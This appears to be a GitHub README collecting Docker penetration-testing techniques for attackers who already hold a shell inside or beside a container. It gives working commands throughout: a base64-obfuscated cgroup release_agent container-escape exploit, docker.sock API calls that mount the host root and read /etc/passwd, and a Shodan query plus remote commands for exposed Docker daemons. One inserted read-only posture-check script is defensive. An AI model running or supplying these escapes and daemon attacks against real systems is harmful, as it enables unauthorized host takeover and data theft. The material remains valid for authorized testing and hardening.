This repository assumes that you have basic knowledge of Docker. Its main focus is collecting the ways to attack a Docker environment in one place.

docker-pentesting

For pentesting an application running inside Docker, we break the work down into two cases:

1 - When we are INSIDE the container
2 - When we are OUTSIDE the container with low privileges (specifically, on the host)

Assuming we got a shell on the server by exploiting an RCE vulnerability, via SSH, or by any other means.

When we are INSIDE the Container

Check if you are inside the container:

  • ls /.dockerenv

Otherwise, if that file is not present:

  • List the cgroup entries of PID 1; inside a container they contain the container ID, so we will know.
    grep '/docker/' /proc/1/cgroup

Check for sensitive environment variables inside the container:

  • Retrieve all environment variables
    env

Multi-container application

  • Find the IP address; always check the network adapters. If the container has two different IPs, we can extend our attack surface.
    ifconfig

  • Use nmap to scan the entire network
    nmap

  • Take an example:

-- If some other container runs a PostgreSQL database, you can easily discover it by scanning the container's network, then access it and check for misconfigurations and default credentials. Beyond this, there are a lot of other things you can find and check.

ARP Spoofing (Never do this)

We could ARP-spoof the traffic, but this delays the network requests.

Container Escaping

Check if the container is running in privileged mode.

  • This command requires the SYS_ADMIN capability, which the --privileged flag grants.
    ip link add dummy0 type dummy

  • In case the ip command is not found
    apt update && apt install iproute2

So you are inside a privileged container...

The exploit below was created by Felix Wilhelm.

  • This command decodes the base64 string below and writes the result to the 'exploit.sh' file.
    echo ZD1gZGlybmFtZSAkKGxzIC14IC9zKi9mcy9jKi8qL3IqIHxoZWFkIC1uMSlgCm1rZGlyIC1wICRkL3c7ZWNobyAxID4kZC93L25vdGlmeV9vbl9yZWxlYXNlCnQ9YHNlZCAtbiAncy8uKlxwZXJkaXI9XChbXixdKlwpLiovXDEvcCcgL2V0Yy9tdGFiYAp0b3VjaCAvbzsgZWNobyAkdC9jID4kZC9yZWxlYXNlX2FnZW50O2VjaG8gIiMhL2Jpbi9zaAokMSA+JHQvbyIgPi9jO2NobW9kICt4IC9jO3NoIC1jICJlY2hvIDAgPiRkL3cvY2dyb3VwLnByb2NzIjtzbGVlcCAxO2NhdCAvbw== | base64 -d > exploit.sh

  • The command below retrieves the processes running on the host, hence the container has escaped. This exploit uses cgroup's notify_on_release feature. When you decode the base64 string you get the list of commands the author of this exploit uses; he also mentions that this is not a bug but a feature. The most convenient way to use this exploit is via the base64-encoded string, as above.
    sh exploit.sh ps

Check if docker.sock is mounted inside the container

  • This retrieves the running containers by querying the Docker daemon; docker.sock is mounted into the container from the host, so we can access it directly.
    curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json

So the Docker socket is mounted in the container...

  • Run this command inside the container. It creates a new container, which we name escaping, that bind-mounts the host's root directory (/) at /host inside the new container; the Cmd directive then reads the host's /etc/passwd, which is visible inside the container as /host/etc/passwd.
    curl -X POST -H "Content-Type: application/json" --unix-socket /run/docker.sock -d '{"Image":"ubuntu:latest", "Cmd":["cat", "/host/etc/passwd"], "Mounts":[{"Type":"bind", "Source":"/", "Target":"/host"}]}' "http://localhost/containers/create?name=escaping"

  • Start the new container (escaping is the name of the container we created).
    curl -X POST --unix-socket /run/docker.sock "http://localhost/containers/escaping/start"

  • Now we can read the file contents by reading the logs of the new container.
    curl --output - --unix-socket /run/docker.sock "http://localhost/containers/escaping/logs?stdout=true"

When we are OUTSIDE the container (with low privileges)

Assuming we have got a shell, but the user has low privileges.

  • Check which users are in the docker group, in other words which users can run the docker command. If our user is a member of the docker group, we can start a container, mount directories, and access the host file system.
    grep docker /etc/group

  • Check whether the docker binary has the SUID bit set. This command lists every file with the SUID bit set; check whether docker is among them. If it is, we can run docker with root permissions.
    find / -perm -u=s -type f 2>/dev/null

  • Check who can access the Docker socket. If our user has access to it, we can use the API to create and run a container and get access to root-owned data.
    ls -l /var/run/docker.sock
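The three checks above (am I in a container, is CAP_SYS_ADMIN present, who can reach the daemon) can be done read-only from the process's own view instead of by side effects such as creating a dummy interface. The script below is an added example written for this page, not code from the repository; the checks take their input as arguments so they can be exercised against constructed data, and the CapEff values in the comments are the documented defaults.

```shell
#!/bin/sh
# Added example (not from the repository): read-only posture checks for a Linux
# host or container. Each check takes its input as an argument; posture_report
# feeds them the live files.

# Is CAP_SYS_ADMIN (capability bit 21) present in a CapEff mask as printed in
# /proc/self/status? Default docker CapEff is 00000000a80425fb (bit not set);
# --privileged grants every bit, e.g. 0000003fffffffff. Returns 0 when set.
has_cap_sys_admin() {
    cap=$1
    [ -n "$cap" ] || return 1
    [ $(( (0x$cap >> 21) & 1 )) -eq 1 ]
}

# Does a /proc/1/cgroup listing show a docker-managed cgroup? This matches the
# cgroup v1 layout used in the note above; cgroup v2 hosts often show only
# "0::/", so /.dockerenv remains the fallback.
in_docker_cgroup() {
    printf '%s\n' "$1" | grep -q '/docker/'
}

# Given the docker line from /etc/group (constructed or real), print its
# member list, i.e. the users who can talk to the daemon without sudo.
docker_group_members() {
    printf '%s\n' "$1" | awk -F: '$1 == "docker" { print $4 }'
}

# Live summary: reads the real files and reports each condition.
posture_report() {
    cap=$(awk '/^CapEff/ { print $2 }' /proc/self/status 2>/dev/null)
    if has_cap_sys_admin "$cap"; then
        echo "CAP_SYS_ADMIN: present (privileged container or host root)"
    else
        echo "CAP_SYS_ADMIN: absent"
    fi
    if [ -e /.dockerenv ] || in_docker_cgroup "$(cat /proc/1/cgroup 2>/dev/null)"; then
        echo "container: yes"
    else
        echo "container: no evidence"
    fi
    if [ -S /var/run/docker.sock ]; then
        echo "docker.sock: present, $(ls -l /var/run/docker.sock)"
    fi
    if [ -r /etc/group ]; then
        echo "docker group members: $(docker_group_members "$(grep '^docker:' /etc/group)")"
    fi
    return 0
}
```

Run `posture_report` on a host to see all four findings at once; a non-empty docker group member list or a world-writable socket is the condition the later checks on this page build on.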

So now we can access docker? Both commands below list the containers/images so that we can read their environment variables, if any.

  • List all Docker containers
    docker ps

  • List all Docker images
    docker images

  • We can read the config of either a container or an image by its name, which is why we first list all containers/images.
    docker inspect <Container id/name or Repository Name>

  • Check whether any docker-compose file is present. This command finds the file by its name.
    find / -name "docker-compose.*"

  • Check whether a vulnerable version of Docker is running; if so, look for public CVE exploits.
    docker --version

Playing with the Docker daemon remotely

  • Shodan query
    product:docker

  • Connect to a Docker daemon remotely and list the containers
    docker -H ip:port ps
    docker -H ip:port ps -a

Now we can execute commands in the containers and have a lot of fun. (But please don't do this without permission from the organization; if you do, no one is responsible.)

Suggestions/feedback

I would like to know more ways to exploit the app/environment running inside Docker, so if you have any suggestion to add, please let me know. Also please let me know if you find any mistakes in this repo, as I am not an expert but am just trying to learn.

Contact

agrawalsmart7
